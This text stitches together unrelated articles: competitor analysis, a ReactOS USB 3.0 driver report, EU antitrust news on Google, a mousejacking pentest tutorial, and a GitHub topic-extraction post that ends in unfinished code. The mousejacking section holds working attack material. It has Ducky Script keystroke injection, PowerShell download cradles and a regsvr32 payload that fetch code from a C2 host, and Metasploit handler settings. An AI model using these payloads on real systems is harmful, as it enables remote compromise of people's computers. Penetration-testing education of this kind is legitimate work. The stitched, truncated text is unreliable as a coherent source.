Many product people usually think this way, but after a while they face reality and look around at the market. They then learn a lot and come up with great new ideas. They learn from others’ mistakes, the cheapest way of learning. And in the end, they can put together a long-term strategy which will lead to victory.

Let’s face the harsh truth quickly: it’s a competitive world and everyone is constantly trying to find information on how their competitors work. Competitor analysis establishes what position in the market you occupy and helps you explore new opportunities to work on.

Competitor analysis: grouping competitors based on value propositions

Grouping competitors based on value propositions and features

How to start researching the competitors?

Start off easily with the basic things. Google still serves as the best tool for competitor research. Just sit down and start searching for different keywords related to your product. Also search the app store and other marketplaces for different solutions.

Competitors can be grouped into two main categories. The direct competitors solve the same problem, with the same value proposition for the same target group. The indirect competitors usually have similar value propositions, but for a different audience, or they target the same audience with different value propositions.

The biggest search engines provide basic examples for direct competition. Google Search and Bing offer the same solution for the same set of users. An encyclopedia, which works in a different way, also contains special pieces of information, so in this example it counts as indirect competition.

Also, for indirect competitors, think about how a business class trip competes with Skype or how Netflix competes with a movie theater. In the first case, the user wants to talk to somebody, in the second case to see a movie. So in a way, they aim for the same thing but in hugely different ways.

People usually use a part of an indirect competitor’s product to solve a problem if they don’t have a better tool built just for them. It’s important to know the workarounds people apply to a problem. That’s where a new tool can succeed.

So collect all competitors in a spreadsheet. Also look around and collect information about their companies and products. Trying out all their products works best.

Collect the following information about each competitor:

  • Name, url, direct or indirect status.
  • Summary: The main findings, the company’s value proposition, the target audience, the product, the big picture and the most interesting findings.
  • Pros: The advantages to their product or marketing, good solutions or design details to learn from.
  • Cons: Everything they suck at, usability issues, missing features; support forums and customer reviews are a good source.
  • Their revenue streams and marketing channels.
  • Numbers: Try to collect some data such as number of website visitors (Alexa, Compete.com; no problem if they are not accurate, they are still comparable to each other), app downloads (AppAnnie, AppFigures, MopApp), social media followers (Facebook, Twitter, LinkedIn, Pinterest, YouTube), prices.

Competitor analysis spreadsheet

Example from a competitor analysis spreadsheet

Competitor analysis is not about copying others’ solutions

Although getting to know the competition gives invaluable help, think about their solutions and add more depth to the findings if time allows. Avoid mindless copying; no solution fits every product. One site’s high usability standards don’t necessarily translate to another’s designs.

Test everything in the context of its own target audience. Using design decisions because a bigger company made them can cause real harm in the long run. Also, good designers draw inspiration from others but don’t copy them.

User testing can reveal the problems right away. It can deliver rewarding information about issues the competitor has, but users can also give feature requests and other insights with a quick interview in addition to the actual testing.

What to look for in the gathered data?

After exploring all the competitors and assembling a huge spreadsheet full of data, do the analysis. First just scan through everything collected and try to mentally piece together the big picture. Look for three things:

  • Market gaps: An underserved segment, a problem that came up during product discovery and unsolved by others, or a new combination that would make sense.
  • What strategies work: From the numbers, guess how each company performs; what are the product or marketing strategies they use; why do the others trail behind?
  • New ideas: Does anything from other industries or apps suit this market; what idea or new solution does this market lack?

After considering all these things, define the product strategy, or if it sounds better: The Master Plan. It identifies the pains to solve, the competitive advantage on the market, and the steps to take to get there.

Aim to create value innovation. This means creating something better than the current solutions at a lower price.

Competing only with lower prices cannibalizes business. Someone will always do it cheaper. As prices drop and profits shrink, running the business gets harder and harder. Instead, create something better than the current solutions, or find a new market and build something for them. But the ultimate success comes with the two together: a better solution at a lower price.

The goal of competitor analysis is to create a product with huge value innovation

Examples of great value innovations

Uber managed to deliver lower prices than traditional taxi companies while also providing a better experience. The app shows where the car is coming from, allows driver ratings, and simplifies payments after receiving your card details the first time. Its huge success is no surprise. AirBnb works similarly: they provide a better experience, renting a normal apartment with a kitchen for less money than a small hotel room.

A clear industry overview and defined product strategy require thorough competitor analysis. Make time for it. Insights about the competitor’s whole product story do more. This information makes entering a new field with a product easier. So collect the direct and indirect competitors, get those spreadsheets up and running and gather the necessary data. And remember, design inspiration can help, but only use best practices when they really work for your target audience. If your strategy makes you happy and you feel fired up to start designing the product, that’s all right. We just have to do a few UX workshops to align the team and then we can let the fun begin.

The five basic steps to competitor analysis

Let’s do a quick recap! Remember these few steps and start conducting your own competitor analysis with ease:

  • Use Google to search for keywords related to your idea, learn about the other competitors on the market;
  • Group competitors as direct and indirect;
  • Try out their solutions;
  • Collect the basics about them in a spreadsheet;
  • Scan the collected information to get the big picture;
  • Share your findings with your team and hold a workshop to define your strategy together.

Have any experience or tips about doing competitor analysis? Please share them in the comments below.

Implementing your own USB 3.0 stack “HOW TO”


Link to my work:https://svn.reactos.org/svn/reactos/branches/GSoC_2017/usbxhci/reactos/drivers/usb/usbxhci/

Link to check out using svn:https://svn.reactos.org/reactos/branches/GSoC_2017/usbxhci/reactos/

All the commits log:https://svn.reactos.org/svn/reactos/branches/GSoC_2017/usbxhci/?view=log

https://code.reactos.org/changelog/~br=GSoC_2017/reactos/branches/GSoC_2017/usbxhci?max=30&view=fe

My aim is to develop a driver for xHCI which is compatible with ReactOS. For the development I’ve used Windows 2003 Server Edition running on VMware Workstation. The first link points to the folder in which all the main code and header files are present. To view any file, click on it and, in the log against any revision, click on view/download to see the code. To get and compile my work please follow the instructions given in https://reactos.org/wiki/Building_ReactOS. Check out the usbxhci branch from the link given above. To build the whole operating system use the commands given in the above link. To build only the xHCI driver use the command “ninja usbxhci” in the output folder (similar to the “ninja livecd” example in the wiki).

Universal Serial Bus (USB) has 5 different modes of data transfer, segregated based on transfer speed, starting at low speed (USB 1.0) and going up to SuperSpeed+ (USB 3.1). xHCI stands for eXtensible Host Controller Interface. The Host Controller (HC) is the hardware that connects network devices or storage devices to the computer. A host controller interface (HCI) is a register-level interface that enables a HC for USB hardware to communicate with a HC driver in software. xHCI is a computer interface specification which is capable of interfacing with USB 1.x, 2.0 and 3.x compatible devices. The xHCI architecture was designed to support all USB speeds, including SuperSpeed (5 Gbit/s) and future speeds, under a single driver stack.

Major Components:

The eXtensible Host Controller Interface specification can be found on Intel’s website.

Image

The above figure shows xHCI general architecture. xHCI gives the register interface by which we can communicate with the hardware.

In the figure there are 3 blocks: PCI config space, MMIO space, and Memory Address Space. In general, hardware is connected to PCI, which is a standardised form of processor bus; it connects to the processor and memory. So from a software point of view our first contact with the HC will be through the PCI bus. Communication with PCI is done by its respective driver. The PCI driver provides the base address, as can be seen in the image.

MMIO space is the register space of the controller. Register space in xHCI is divided into 5 segments. Capability registers are at a direct offset from the base address. Operational registers are at offsets from the operational base, which can be calculated from the information given in the documentation. Similarly, other bases like the runtime base, doorbell base and extended capabilities base can be calculated. All of these are hardware components accessible by the software.

Memory address space is the space allocated for the xHCI driver in memory (RAM). When the driver is loaded it is allocated some memory which can be used as required. In the memory address space the crucial components are the Event ring, Command ring, Device contexts and Transfer rings. Other components exist to support these; for example, the event ring segment table stores the locations of the event ring segments so the hardware can find them, and the device context base address array holds the addresses of the different device contexts.

Rings are circular data structures used by the hardware and software to communicate with each other. Event rings are used by the hardware to notify the software about different events like device attach, command completion, etc. The command ring is used by the driver to send commands to the controller, and transfer rings are used to transfer data between the computer and the connected devices.
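
As a rough illustration of the ring idea (a toy Python sketch, not the ReactOS driver's actual data structures), a producer enqueues items, a consumer walks behind it, and both wrap back to slot 0 at the end:

RING_SIZE = 8

class Ring:
    def __init__(self):
        self.slots = [None] * RING_SIZE
        self.enqueue_ptr = 0            # where the producer writes next
        self.dequeue_ptr = 0            # where the consumer reads next

    def enqueue(self, item):
        self.slots[self.enqueue_ptr] = item
        self.enqueue_ptr = (self.enqueue_ptr + 1) % RING_SIZE   # wrap around

    def dequeue(self):
        item = self.slots[self.dequeue_ptr]
        self.dequeue_ptr = (self.dequeue_ptr + 1) % RING_SIZE
        return item

# e.g. the driver (producer) queues commands, the controller (consumer) picks them up
ring = Ring()
ring.enqueue("ENABLE_SLOT")
ring.enqueue("ADDRESS_DEVICE")
print(ring.dequeue(), ring.dequeue())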

Link to blogs:  https://reactos.org/blog/49141

USB stack

The above diagram shows the USB driver stack in Windows. After deliberation we’ve decided to take the existing usbport driver in ReactOS and implement the xHCI driver below it. Because of this, all the functions needed to communicate with usbport remained the same as in ehci.

After a stable empty driver was created, I started working on the functions. Starting the controller was the first objective. This included many steps, like initializing registers with required values. Starting the controller broke down into two parts: initializing hardware and initializing resources. Resources are the data structures in the Memory address space.

In the next phase I worked on generating interrupts. The interrupt mechanism is very different for xHCI compared to older versions; this is detailed in one of my blog posts. It supports the MSI interrupt mechanism, but the PCI driver present in ReactOS didn’t support that, so I had to go with the traditional interrupt generation mechanism. After some initial implementation interrupts were being generated, but after a single interrupt the driver stopped accepting further interrupts.

To get the driver to accept multiple interrupts many other functions were needed. First, to test the interrupt mechanism, I sent a command to check if the controller was processing it and generating an interrupt. Here I was stuck for some time as the code seemed to be right but it wasn’t working. Upon debugging we found a typecast issue in the runtime register base address calculation that caused the problem. Once that was cleared up I worked on various functions like GetPortStatus which are required for interrupt processing.

The next major hurdle was the continuous calling of some functions, which we initially thought to be a bug. Later it turned out to be a regular polling mechanism. After that got cleared up, and after some code optimisation/debugging, the driver started generating interrupts on every connect/disconnect of the pendrive. In Windows 2003 Server Edition we can see an unknown device attached when we connect a pendrive.

Image

In the pre-final week I looked into USB device initialization. This required sending various commands to the controller. A rudimentary implementation of the command and event rings was present from the start, but it needed to be refined. So I worked on functions to send commands and receive events, and also to account for looping of the ring. I’ve tested the rings until they looped and everything was functioning normally.

As a part of the final submission I cleaned up the code: removed commented-out code, edited the code to follow the ReactOS coding style, and added licence headers. Upon merging with the trunk there were a few issues that were handled. I’ve modified the stop controller routine so that the controller can be safely disabled and enabled in the device manager.

Summary:

The driver is now able to successfully start the controller. It generates port status change events for every disconnect or connect and also generates events on command completion. It generates an interrupt if there is any event and handles any spurious interrupts. It can send commands to the controller, and successful completion of valid commands is tested. Both the command ring and event ring are capable of handling ring-full situations and also the ring loop-back scenario. The controller can be disabled, which successfully stops the controller, and re-enabled, which essentially resets the driver.

The next logical step will be to complete USB device initialization. This involves assigning a device slot, getting the address, setting up the control endpoint, etc. The data structures required to assign a device slot and the functions to get the address are ready. Once the device slot is assigned, the first operation that the driver performs on the USB device is to set an address. This is done using the command ring. After that it moves forward to the Device Configuration phase, for which we need the control endpoint. Hence the QueryEndpointRequirements function should be dealt with first. After that the OpenEndpoint function should be written.

As control transfers are done using the ring mechanism, and the code for the command/event rings is working, we can just port it to make the transfer ring function. After all the required functions are ready we can initialise the USB device and get its description using a control transfer. There are other minor tasks that should be worked on later; for example, all the ring structures can actually be expanded as per the specification, but for now we’ve decided to make them static. That can be altered later without affecting the main code as the structures are set up for it. All of these are short-term future work.

In the long run a lot more needs to be implemented: all the transfer types (control transfer, bulk transfer, isoch transfer, etc.), as well as functions to handle slot management and to handle older USB types.


Google to Comply with EU Search Demands to Avoid More Fines


Google will comply with Europe’s demands to change the way it runs its shopping search service, a rare instance of the internet giant bowing to regulatory pressure to avoid more fines.

The Alphabet Inc. unit faced a Tuesday deadline to tell the European Union how it planned to follow an order to stop discriminating against rival shopping search services in the region. A Google spokeswoman said it is sharing that plan with regulators before the deadline expires, but declined to comment further.

The EU fined Google a record 2.4 billion euros ($2.7 billion) in late June for breaking antitrust rules by skewing its general search results to unfairly favor its own shopping service over rival sites. The company had 60 days to propose how it would "stop its illegal conduct" and 90 days to make changes to how the company displays shopping results when users search for a product. Those changes need to be put in place by Sept. 28 to stave off the risk that the EU could fine the company 5 percent of daily revenue for each day it fails to comply.

"The obligation to comply is fully Google’s responsibility," the European Commission said in an emailed statement, without elaborating on what the company must do to comply.

The onus is on Google to find a solution that satisfies regulators, who’ve learned from past battles with Microsoft Corp. and Intel Corp. Microsoft’s failure to obey a 2004 antitrust order and charge reasonable fees for software licenses saw it fined 899 million euros four years later. Microsoft argued that its prices were fair and it shouldn’t be compelled to give away patented innovation.

‘Mystified’ Lawyer

Intel’s lawyer said in 2009 that he was "mystified" as to what regulators wanted the company to do to comply with an order to halt anti-competitive rebates for chip sales to computer makers. Intel may finally receive clarity when the EU’s top court rules on its legal challenge to a 1.06 billion euro fine on Sept. 6.

Google has the option of challenging the fine and the antitrust order to the EU courts, which can take years to reach a final decision. Next week’s Intel ruling will come some eight years after the EU fine. Google would have to comply with the order ahead of any final decision from EU judges.

The EU now has a month to check if Google’s planned changes will fit the bill. Regulators are also expected to levy fines in separate investigations into Google’s Android mobile-phone software -- possibly as soon as next month -- and the AdSense advertising service. Margrethe Vestager, the EU’s antitrust chief, has also threatened further probes on travel or map services.

Regulators sought technical help in June to evaluate how Google complies with the order, setting a budget of up to 10 million euros to pay for experts in search engine optimization and search engine marketing.

ICOMP, a coalition of technology and media companies, called for Google’s offer to be made public and for the EU to publish details of how the company breached antitrust law.

"These affect everyone in the online and mobile worlds so they must be made public for evaluation," ICOMP’s Michael Weber said in a blog posting.

Mouse to RAT: vulnerabilities in most of the Logitech Unifying dongle devices


Hostile Airwaves: Mousejacking

On internal engagements, poisoning name resolution requests on the local network (à la Responder) is one of the tried and true methods of obtaining that coveted set of initial Domain credentials.  While this approach has worked on many clients (and has even given up Domain Admin in less time than it takes to grab lunch), what if the Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) protocols are configured securely or disabled?  Or, what if Responder was so successful that you now want to prove other means of gaining that initial foothold?  Let’s explore…

PROTIP: Always prove multiple means of access whenever possible during engagements!

There are a multitude of attacks a penetration tester can leverage when conducting physical walkthroughs of client spaces.  One of the more interesting, and giggle-inducing, involves exploiting wireless peripherals.  This technique, known as “mousejacking”, gained some notoriety in early 2016 when Bastille, a firm specializing in wireless and Internet of Things (IoT) threat detection, released a whitepaper documenting the issue.  At a high-level, the attack involves exploiting vulnerable 2.4 GHz input devices by injecting malicious keystrokes (even if the target is only using a wireless mouse) into the associated USB dongle.  This is made possible because many wireless mice (and a handful of keyboards) either don’t use encryption between the device and its paired USB dongle, or will accept rogue keystrokes even if encryption is being utilized.  WIRELESS WHOOPSIE!

You Vulnerable, Bro?

At this point, you are probably wondering which input devices are vulnerable.  While a more comprehensive list can be found on Bastille’s website, I’ve personally had the most experience with Microsoft and Logitech products while on engagements.

Vulnerable Microsoft products include, and most certainly aren’t limited to, the following devices:

With Logitech, devices that are likely to be affected are ones that leverage the “Unifying” dongle, which is meant to work with a large number of wireless input devices the company produces.  The dongle can be easily identified by an orange star printed on the hardware:


Have Your Hardware Handy

To help us conduct our mousejacking attack, we need to first acquire SeeedStudio’s Crazyradio PA USB dongle and antenna.  This is a ~$30 long-range 2.4 GHz wireless transmitter (which uses the same series of transceiver, Nordic Semiconductor’s nRF24L, that many of the vulnerable devices leverage) that is intended for use on hobby drones; however, we are going to flash the firmware (courtesy of Bastille) to weaponize it for our own nefarious purposes.  *EVIL CACKLE*  This new firmware will allow the dongle to act promiscuously, adding packet sniffing and injection capabilities.  Once the Crazyradio PA is in hand, the instructions for setting it up with new firmware can be found here.

It is also helpful to have one or more known vulnerable devices on hand to leverage for testing.  In my personal lab, I am utilizing Logitech’s m510 Wireless Mini Mouse and Microsoft’s Wireless Mobile Mouse 4000.

JackIt In The Office (But Don’t Get Caught…)

The software of choice for this scenario is going to be JackIt, a python script written by phiksun (@phikshun) and infamy (@meshmeld).  The project leverages the work of Bastille and simplifies both identification of devices and the attack delivery.  Using Kali, or your distribution of choice, go ahead and  grab the script:

$ git clone https://github.com/insecurityofthings/jackit.git /opt/

Take a gander at the README.md file and follow the instructions to install JackIt.  Once that is completed, ensure that the flashed Crazyradio PA dongle is plugged in prior to starting up the tool.  Failure to do so will cause JackIt to throw an error.  Let’s start by running JackIt without any arguments, which will put the tool into reconnaissance mode, allowing you to see what wireless input devices are in range:

/opt/jackit/$ ./jackit.py

Take a few moments to inspect JackIt’s output before continuing:

When a device is discovered, a new row is created with a number assigned in the KEY column based on order of initial appearance.  You will need to reference this number when targeting a particular device (more on that shortly).  The ADDRESS column shows the hardware MAC address for the wireless device.  This can be useful when determining whether you’ve previously seen / targeted a particular device (JackIt does not keep track of your previously targeted devices, so when working with multiple devices, you’ll need to keep track of them yourself).  The TYPE column displays the brand of the device once enough packets are captured by JackIt to accurately identify it.  Note in the screenshot above that the second device (KEY 2) has not been adequately fingerprinted yet.

WARNING: You cannot successfully target a device without the TYPE column populated.

The COUNT and SEEN columns relate to wireless communication detected between a device and its dongle.  COUNT refers to the number of times communication between the device and dongle were picked up by the Crazyradio PA.  SEEN informs us how many seconds have passed since the last communication was detected.  Devices that haven’t been detected in a while are either a) not being actively used at the moment or b) no longer in range.  With the former, there is a potential that the user has locked their computer and stepped away.  In either case, these are probably not ideal targets.

The CHANNELS column notates the channel(s) that the wireless peripheral and dongle are utilizing to communicate.  Lastly, PACKET shows the contents of the last captured communication.  For our purposes, we can ignore these two columns.

To actually exploit devices that are discovered, JackIt will need to know what malicious keystrokes to send to a victim.  The tool takes commands in Ducky Script format, the syntax leveraged by the Rubber Ducky, a keystroke-injecting USB thumb drive created by Hak5.  Whereas a Rubber Ducky requires Duckyscript to be encoded prior to being used for exploitation, this is not the case for JackIt… simply pass the “plaintext” commands in a text file.  If you are unfamiliar with Duckyscript, please refer to Hak5’s readme page to get your learn on.

A recommended starting point for a Duckyscript mousejacking template can be found below.  Given that it may be possible for a user to see a mousejacking attempt in progress, an attempt has been made to streamline the attack as much as possible without sacrificing accuracy.  DELAY times are much shorter than with traditional Rubber Ducky scripts as there is no need to wait for driver installation, since we are not physically plugging a USB device into the victim’s machine.  In addition to keeping the DELAY values low, it is also helpful to shorten the actual attack payload as much as possible.  The reason here is twofold: fewer keystrokes mean less time to send characters to the victim (each keystroke is literally “typed” out on the target and can draw attention to the attack), and it lessens the chance of any data-in-transit issues (wireless attacks can be unstable, with possible lost or malformed characters).  We will discuss these types of issues in greater detail later on.

GUI r
DELAY 300
STRING ***INSERT MALICIOUS PAYLOAD HERE***
DELAY 300
ENTER
ENTER

Using the script above, JackIt would open the Windows “run” prompt, pause briefly, pass whatever malicious payload we specify, pause briefly, then submit the command.  To give you an idea of the speed of keystroke injection, as well as the user’s visibility of an active mousejacking attack, I have recorded a clip of sending a string of characters to a victim’s machine using the above template:

As you can see, even though we have taken steps to streamline the attack, there is still a window (no pun intended, I promise!) in which a user could be alerted to our activities.

Note:  If the keystrokes injected had been calling a valid program such as powershell.exe, the window would have closed at the end of the injection once the program had executed.  In this case, the submitted run prompt window popped back up and highlighted the text when it was unable to properly process the command.

From Mouse To RAT

Next stop, Exploitation Station!  For most scenarios, there will be a minimum of two machines required.  The “attack” machine will have the Crazyradio PA dongle attached and JackIt running.  The operator of this machine will walk near or through the target’s physical workspace in order to pick up wireless input devices in use.  Any payloads submitted by this machine will direct the victims to reach out to the second machine which is hosting the command & control (C2) server that is either sitting somewhere on the client’s internal network or up in the cloud.

So, what malicious payload should we use?  PowerShell one-liners that can deliver remotely hosted payloads are a great starting point.  The Metasploit Framework has a module (exploit/multi/script/web_delivery) built specifically for this purpose.

Let’s take a look at the Web Delivery module’s options:

Note the default exploit target value is set to Python.  To leverage PowerShell as the delivery mechanism we will need to run SET TARGET 2.  This will ensure our generated payload uses the PowerShell download cradle pentesters and malicious actors have come to love!  In most cases, we will want to set both SRVHOST and LHOST to point to the machine running the Web Delivery module, which is acting as the C2 server.  SRVPORT will set the port for hosting the malicious payload while LPORT sets the port for the payload handler.  While it is usually recommended that you use a stageless payload (such as windows/meterpreter_reverse_https) whenever possible in an attempt to increase the chance of successfully bypassing any anti-virus solutions that may be in place, attempting to do so with the Web Delivery module will result in an error.  This is due to the payload exceeding Windows’ command-line limit of approximately 8192 characters (Cobalt Strike payloads bypass this limitation through compression, but that’s another deep dive altogether).  Given this limitation, let’s use a staged payload instead: windows/meterpreter/reverse_https.  Lastly, let’s set the URIPATH to something short and sweet (/a) to avoid Metasploit generating a random multi-character string for us.  Once everything is set up, the module’s options should look similar to the following:

Let’s go ahead and run the module to generate our PowerShell one-liner and start our payload handler:

As mentioned previously, the preference for this type of attack is to have as short of a string as possible.  What the Web Delivery module generates is a little longer than I like for most mousejacking attempts:

powershell.exe -nop -w hidden -c $v=new-object net.webclient;$v.proxy=[Net.WebRequest]::GetSystemWebProxy();$v.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $v.downloadstring('http://192.168.2.10/a');

This doesn’t look like a vanilla PowerShell download cradle, does it?  The module generates a random variable ($v in this example) and uses that to obfuscate the cradle in order to bypass some defenses.   Additionally, there are commands that make the cradle proxy-aware which might assist in the payload successfully calling out to the Internet (potentially helpful if your C2 server resides in the cloud).

We can certainly shorten this payload and have it still work, but we have to consider the benefits vs. tradeoffs of doing so.  If our C2 server is internal to the client’s network, we can remove the proxy-related commands and still leave some obfuscation of the cradle intact.  Or, if we are looking for the absolutely shortest string, we can remove all obfuscation and restore a more standard-looking download cradle.  It ultimately comes down to evading user detection vs. evading host-based protections.  Below are examples of each modification:

powershell.exe -nop -w hidden -c $v=new-object net.webclient;IEX $v.downloadstring('http://192.168.2.10/a');

powershell.exe -nop -w hidden -c IEX(new-object net.webclient).downloadstring('http://192.168.2.10/a');
PROTIP: If you’re interested in PowerShell obfuscation techniques, check out the work of @danielhbohannon!

Now that we’ve set up our C2 server and have our malicious string in place, we can modify the Duckyscript template from earlier, making sure to save it locally:

GUI r
DELAY 300
STRING powershell.exe -nop -w hidden -c IEX(new-object net.webclient).downloadstring('http://192.168.2.10/a');
DELAY 300
ENTER
ENTER

To use JackIt for exploitation vs. reconnaissance, simply call the Duckyscript file with the --script flag:

/opt/jackit/$ ./jackit.py --script ducky-script.txt

In the screenshot below, we can see that we have discovered two wireless peripherals that have been fingerprinted by JackIt.  When we are ready to launch our mousejack attack, simply press CTRL-C:

We can select an individual device, multiple devices, or simply go after all that were discovered.  Once we’ve made our selection and hit ENTER,  our specified attack will launch.  Depending on the brand of device targeted, you may see many 10ms add delay messages on your screen before the completion of the script.  You’ll know that JackIt has finished when you see the following message:  [+] All attacks completed.

Let’s take a look at our Web Delivery module and see if any of the attacks were successful:

Looks like we got a hit!  While we had attempted to mousejack two targets, only one successfully called back.  There are several reasons why a mousejacking attempt might fail and we will discuss those shortly.

So, we’ve now successfully used Metasploit’s Web Delivery module in conjunction with JackIt to compromise a wireless peripheral.  There are other frameworks we can utilize that offer similar PowerShell one-liners, including Cobalt Strike and Empire.  Let’s briefly talk about Cobalt Strike, since there is a non-PowerShell payload that I like to use for mousejacking.

Cobalt Strike has an attack called Scripted Web Delivery, which is similar to Metasploit’s Web Delivery, but offers more payload options.  While there is a PowerShell option available, I am partial to the regsvr32 payload as it’s short and sweet; however, this does require Microsoft Office to be installed on the target system as it leverages Visual Basic for Applications (VBA) macros and Component Object Model (COM) scriptlets:

The payload looks similar to the following once everything is configured:

regsvr32 /u /n /s /i:http://192.168.2.10:80/a scrobj.dll

How this payload works is outside the scope of this article, but if you’re interested in learning more, please check out Casey Smith’s (@subTee) blog post.

Before we continue, I want to mention that I’ve had issues starting up JackIt again after a successful attack, receiving an error message like the one below:

I’ve been able to reproduce this error on Kali running within VMWare as well as a standalone Kali box.  Let me know if you experience this phenomenon on other flavors of Linux.  The only way to get around this error other than restarting the operating system is to unbind and then rebind the USB drivers for the CrazyRadio PA  dongle.  This can be achieved by unplugging and then replugging in the CrazyRadio PA or by issuing some specific commands via the console.  Luckily for you, my awesome coworker Dan Astor (@illegitimateDA), wrote a Bash script to do all that magic for you.  Just simply run the following script whenever the error message shows its ugly face and then rerun JackIt:

#!/bin/bash

#Tool :: USB device reset script developed for use with JackIt & CrazyRadio PA USB Adapter
#Author :: Dan Astor (@illegitimateDA)
#Usage :: After running an attack with JackIt, run the script to reset the USB adapter. This will fix the USB Core Error Python throws.

#Unbind USB devices from the system and rebind them
for device in /sys/bus/pci/drivers/uhci_hcd/*:*; do
     #Unbind the device
     echo "${device##*/}" > "${device%/*}/unbind"
     #Bind the device
     echo "${device##*/}" > "${device%/*}/bind"
done

I Was Told There Would Be Shells…

So, here we are, owning and pwning unsuspecting victims who fail to know the danger in the dongle. But, what if all doesn’t go according to plan? What if we unleash an attack on multiple peripherals only to discover that there are no shells waiting for us? THE HORROR!

First things first: let’s discuss range. Quite honestly, the antenna that comes with the CrazyRadio PA isn’t an amazing performer despite the dongle being advertised as “long-range.” It only takes one missing or malformed character in our attack string to rain on our pwnage parade.  I’ve seen missing characters on more than one occasion and have even witnessed run prompts with an endless string of forward slashes that prevent the prompt from closing, leaving the user no choice but to reboot the affected computer.  These situations are not desirable as we don’t receive shells (BOO!), users are potentially alerted to our attacks (BOO TIMES TWO!), and we may even negatively affect the productivity of our client’s employees (CLIENT RAGE!).  Based on my experience, I believe many of these issues can be avoided by improving signal strength.  I’ve had some luck with powerful Alfa antennas, such as the 9dBi Wifi Booster. The only issue with this particular choice is that one tends to draw a lot of attention walking around with a 15″ antenna sticking out of the side of a laptop. 😛 My advice: experiment with different options and find one that you find reliable at the greatest range.

Second thing to note: Microsoft wireless devices can be tricky little buggers to target.  This is because unlike Logitech peripherals, Microsoft utilizes sequence numbers for every communication between device and dongle.  JackIt monitors the sequence numbers but if the user performs some action (clicks a button, moves the mouse, etc.) before the attack is delivered, the sequence numbers will no longer align and we will once again find ourselves with missing or malformed characters.  While sometimes difficult to pull off, I prefer to have “eyes on” a target if they are using a Microsoft peripheral in order to figure out the ideal time to launch the attack.  If I’m completely blind and have both Microsoft and Logitech devices in range, I tend to err on the side of caution and target a Logitech device.

Third consideration: how we choose to construct the URL that points to our payload matters.  I found this out the hard way on a recent engagement.  Leveraging Cobalt Strike, I was hosting a payload with a URL similar to the examples presented earlier in this post (http://ip_address/a).  After launching an attack on a promising target, I discovered that there was no shell waiting for me on the C2 server.  Upon inspecting Cobalt Strike’s Web Log, I saw a message similar to the following:

This was perplexing; why did my target attempt to reach a URL ending in a capital /A?  Had I somehow mistyped the attack string in my DuckyScript file?  After a quick check, this was ruled out.  Then, it hit me… the user must have had CAPS LOCK enabled!  I was shell-blocked by something so stupid!  Ever since that engagement, I leverage numbers (i.e. /1) in my mousejacking URLs to prevent similar issues in the future.

Lastly, there are some remediation actions that the client may have taken.  Which brings us to…

What’s A Poor Dongle To Do?

The easiest solution to the problem of mousejacking is relatively obvious: stick to wired peripherals (or migrate to Bluetooth).  That being said, both Microsoft and Logitech have attempted mitigation strategies for their affected products if you are absolutely in love with your 2.4 GHz device.

Microsoft released a Security Advisory in April 2016 with a corresponding optional update.  The update attempts to add more robust filtering at the dongle so that rogue keystrokes are detected and properly discarded.  Researchers who have tested the update say it’s relatively “hit or miss”, with some devices remaining vulnerable even after the patch is applied.

Logitech has taken a different approach, requiring users to manually apply a firmware update in order to remedy the issue.  It’s a multi-step procedure that may prove difficult for less technical end users to apply, and too cumbersome for IT departments to roll out manually across an entire user population.

Given these facts, I have a feeling that we will be finding mousejack-able devices within enterprises for a while to come.  If within the scope of your engagement, consider adding mousejacking to your toolbox of destruction!

Topic Suggestions for Millions of Repositories

We recently launched Topics, a new feature that lets you tag your repositories with descriptive words or phrases, making it easy to discover projects and explore GitHub.com. Topic suggestions on public repositories provide a quick way to add tags to repositories.

[Screenshot: suggested topics displayed on a public repository]

These suggestions are the result of recent data science work at GitHub. We applied concepts from text mining, natural language processing (NLP), and machine learning to build a topic extraction framework.

Because Topics is a brand new concept at GitHub, we started with no cues from users on what defined a topic and what type of topics they would typically add to their repositories. Given our focus on improving discoverability, internally we defined Topics as any “word or phrase that roughly describes the purpose of a repository and the type of content it encapsulates”. These can be words such as “data science”, “nlp”, “scikit-learn”, “clustering algorithm”, “jekyll plugin”, “css template”, or “python”.

While no tag or label-type feature existed prior to the start of this project, we did have a rich set of textual information to start from. At its core, GitHub is a platform for sharing software with other people, and some of the data typically found in a repository provides information to humans rather than instructions for computers. Repository names, descriptions, and READMEs are text that communicate functionality, use case, and features to human readers. That’s where we started.

We developed a topic extraction framework, called repo-topix, to learn from the human-readable text that developers provide in repository names, descriptions, and READMEs, incorporating methods from text mining, NLP, and supervised machine learning. At a high level, repo-topix does three things:

  1. Generates candidate topics from natural language text by incorporating data from millions of other repositories
  2. Selects the best topics from the set of candidates
  3. Finds similarities and relationships in topics to facilitate discoverability

Below, we describe each step of the repo-topix framework in greater technical detail.

[Figure: overview of the repo-topix framework]

Generating candidate topics from natural language text

Preprocessing of READMEs

While README files within GitHub.com tend to be formatted using Markdown and reStructuredText with fairly lightweight formatting, there are certain sections such as code blocks, tables, and image links that are not useful for topic suggestions. For example, month names from within a table would not be useful to a user.

To extract text sections of interest, we developed a heuristics-based README tagger that marks sections in the README file as relevant or non-relevant. This simple tagger uses common formatting cues such as indentation, spacing, and use of backticks to determine “noise sections” and “valid text sections”. The use of a grammar-based parser was unnecessary as we only care about useful text sections and regard everything else in a README as noise.

Once we extract text sections of interest, we perform basic cleanup to remove file extensions, HTML tags, paths, and hosts from further processing, as these are more distracting than useful. Finally, the remaining text gets segmented into coarse-grained units using punctuation marks as well as README section markers such as contiguous hash symbols.
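
To make this concrete, here is a minimal Python sketch of this style of heuristic preprocessing. The patterns, section markers, and cleanup rules below are illustrative stand-ins rather than the actual repo-topix tagger.

import re

# Lines that look like noise in a README: heavily indented code, table rows, image links
NOISE_LINE = re.compile(r"^(\s{4,}|\t|\|.*\||!\[.*\]\(.*\))")

def relevant_sections(readme_text):
    """Heuristically keep prose lines; drop fenced code blocks, tables, and image links."""
    kept, in_code = [], False
    for line in readme_text.splitlines():
        if line.strip().startswith("```"):   # toggle on fenced code block delimiters
            in_code = not in_code
            continue
        if in_code or NOISE_LINE.match(line):
            continue
        kept.append(line)
    return "\n".join(kept)

def cleanup(text):
    """Remove HTML tags, URLs/hosts, paths, and common file extensions."""
    text = re.sub(r"<[^>]+>", " ", text)                        # HTML tags
    text = re.sub(r"https?://\S+", " ", text)                   # URLs and hosts
    text = re.sub(r"\S+/\S+", " ", text)                        # file-system paths
    text = re.sub(r"\b\w+\.(md|py|js|yml|txt)\b", " ", text)    # file extensions
    return text

def segment(text):
    """Split into coarse-grained units on punctuation and '#' section markers."""
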